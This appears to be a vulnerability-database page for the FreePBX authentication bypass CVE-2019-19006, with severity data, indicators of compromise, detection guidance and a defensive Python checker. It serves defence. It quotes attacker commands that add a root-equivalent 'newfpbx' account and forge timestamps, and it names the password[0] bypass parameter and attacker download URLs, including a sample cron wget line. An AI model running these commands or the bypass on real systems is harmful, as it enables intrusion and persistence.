CVE-2019-19006
published 2019-11-21

CVE-2019-19006: Sangoma FreePBX 15.0.16.26 and below, 14.0.13.11 and below, 13.0.197.13 and below have Incorrect Access Control (an authentication bypass in the web administration login).

Priority: P1 (86) · CVSS 3.1 base score 9.8, critical
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV: CISA Known Exploited Vulnerability, remediation due 2026-02-24
ITW: Exploited in the wild
EPSS: 36.61% (98.3rd percentile)

Affected (3 ranges)

Vendor    Product   Version range             Fixed in
sangoma   freepbx   13.0.0.0 – 13.0.197.13    (not listed)
sangoma   freepbx   14.0.0.0 – 14.0.13.11     (not listed)
sangoma   freepbx   15.0.0.0 – 15.0.16.26     (not listed)

Detection & IOCs (extracted from sources)

ip        45.234.176.202
domain    crm.razatelefonia.pro
url       http://45.234.176.202/new/k.php
path      /var/www/html/rest_phones/ajax.php
path      /var/www/html/admin/modules/core/ajax.php
path      /var/www/html/admin/assets/js/config.php
path      /var/www/html/admin/views/ajax.php
path      /var/www/html/admin/views/.htaccess
path      /var/www/html/admin/modules/freepbx_ha/license.php
path      /var/lib/asterisk/bin/zen2
path      /var/lib/asterisk/bin/devnull2
path      /var/lib/asterisk/bin/devnull
path      /var/spool/asterisk/tmp/serv
path      /var/spool/asterisk/tmp/test.sh
path      /etc/freepbx.conf
path      /etc/amportal.conf
path      /etc/asterisk/sip_additional.conf
command   useradd -s /bin/bash -ou 0 -g 0 -p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx &>/dev/null
command   touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php
other     password[0]
  • CVE-2019-19006 exploitation can be detected by monitoring HTTP login requests to FreePBX where the 'password' parameter is sent as an array element (e.g., password[0]=<any_value>), which bypasses authentication by preventing session teardown.
  • Detect EncystPHP web shell presence by scanning for ajax.php files in non-standard FreePBX paths such as /var/www/html/digium_phones/, /var/www/html/phones/, /var/www/html/fpbxphones/, /var/www/html/freepbxphones/, /var/www/html/freepbx/, and /var/www/html/admin/assets/.
  • Alert on creation of a Linux user named 'newfpbx' with UID/GID 0 (root-equivalent), which is a persistence indicator for EncystPHP.
  • Monitor for the MD5-hashed credential check pattern in PHP files on FreePBX hosts; the EncystPHP web shell uses a hard-coded MD5 hash for authentication under an interface titled 'Ask Master'.
  • Detect suspicious crontab entries that repeatedly download k.php from external IPs to /var/lib/asterisk/bin/ paths (zen2, devnull2, devnull), which are persistence indicators for EncystPHP.
  • Check Point IPS signature 'Sangoma FreePBX Authentication Bypass (CVE-2019-19006)' can be used to detect exploitation attempts against vulnerable FreePBX servers.
  • Monitor for SIPVicious svmap scanning activity targeting FreePBX systems, as this tool is used by INJ3CTOR3 to identify vulnerable targets prior to CVE-2019-19006 exploitation.
  • Detect timestamp-forging activity on FreePBX web directories: alert on 'touch' commands referencing ajax.php against legitimate footer.php timestamps, used by EncystPHP to evade detection.
  • The EncystPHP campaign described in the Fortinet report exploits CVE-2025-64328, not CVE-2019-19006 directly; the association with CVE-2019-19006 is historical (INJ3CTOR3 threat actor attribution). IOCs from the Fortinet report are operationally linked to the same threat actor but not to the original 2019 CVE exploitation infrastructure.
  • The download URL http://45.143.220.116/emo1.sh returned HTTP 404 at the time of Check Point Research's analysis; its purpose was unknown and the IOC may no longer be active.
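The host and log checks in the list above, written out as an added example in Python. This is not code from the page, from FreePBX, or from the Check Point or Fortinet write-ups. The sample HTTP requests, /etc/passwd lines and crontab entry are constructed for the example; the IP address, download URL, web directories and the newfpbx account name are the ones this page lists. Function and constant names are the example's own.

```python
"""Offline checks for the CVE-2019-19006 / EncystPHP indicators listed on this page.

Added example, not code from the original page or from FreePBX. All sample
inputs are constructed; the IPs, URLs, paths and account name come from the
page's IOC list.
"""
import re
from urllib.parse import parse_qs, urlsplit

# 1. Login requests where 'password' arrives as a PHP array element.
# PHP turns password[0]=x, password[]=x or the URL-encoded password%5B0%5D=x
# into an array in $_REQUEST; a scalar password never matches this regex.
ARRAY_PASSWORD = re.compile(r"^password\[")


def request_has_array_password(method: str, url: str, body: str = "") -> bool:
    """True if any query or POST-body parameter name is password[...]."""
    names = set(parse_qs(urlsplit(url).query, keep_blank_values=True))
    if method.upper() == "POST":
        names |= set(parse_qs(body, keep_blank_values=True))
    return any(ARRAY_PASSWORD.match(n) for n in names)


# 2. Root-equivalent accounts created with useradd -ou 0 -g 0 (e.g. newfpbx).
def root_equivalent_accounts(passwd_text: str) -> list:
    """Names of /etc/passwd entries with UID 0 or GID 0 that are not 'root'."""
    found = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if not line.strip() or len(parts) < 4:
            continue
        name, _, uid, gid = parts[:4]
        if name != "root" and (uid == "0" or gid == "0"):
            found.append(name)
    return found


# 3. Cron entries that fetch a remote file into the /var/lib/asterisk/bin/
# drop locations the page lists (zen2, devnull2, devnull).
CRON_FETCH = re.compile(
    r"\b(?:curl|wget)\b.*https?://[^\s]+.*?/var/lib/asterisk/bin/(zen2|devnull2|devnull)\b"
)


def suspicious_cron_lines(crontab_text: str) -> list:
    """Crontab lines that download over HTTP into the known drop paths."""
    return [l for l in crontab_text.splitlines() if CRON_FETCH.search(l)]


# 4. ajax.php placed under directories the page names as web-shell locations.
# Directory set taken from the page's IOC and detection notes (assumed complete
# only for this example).
SHELL_DIRS = {
    "/var/www/html/digium_phones", "/var/www/html/phones",
    "/var/www/html/fpbxphones", "/var/www/html/freepbxphones",
    "/var/www/html/freepbx", "/var/www/html/admin/assets",
    "/var/www/html/rest_phones", "/var/www/html/admin/views",
}


def is_suspicious_ajax_path(path: str) -> bool:
    """True for an ajax.php directly inside one of the listed directories."""
    directory, _, filename = path.rpartition("/")
    return filename == "ajax.php" and directory in SHELL_DIRS


if __name__ == "__main__":
    # Constructed sample inputs.
    print(request_has_array_password(
        "POST", "/admin/config.php", "username=admin&password%5B0%5D=x"))
    print(root_equivalent_accounts(
        "root:x:0:0:root:/root:/bin/bash\n"
        "asterisk:x:498:498::/var/lib/asterisk:/sbin/nologin\n"
        "newfpbx:x:0:0::/home/newfpbx:/bin/bash\n"))
    print(suspicious_cron_lines(
        "*/5 * * * * wget -q http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/zen2\n"
        "0 3 * * * /usr/sbin/fwconsole reload\n"))
    print(is_suspicious_ajax_path("/var/www/html/admin/assets/ajax.php"))
```

The first check is the one worth wiring into a web-log or WAF rule: it keys on the parameter name, so URL-encoded brackets and empty-index forms (password[]) are caught, and a legitimate scalar password is never flagged. The other three are periodic host checks; run them against the live /etc/passwd, the asterisk and root crontabs, and a find over /var/www/html.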

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck             9.8     CRITICAL
cisa                  9.8     CRITICAL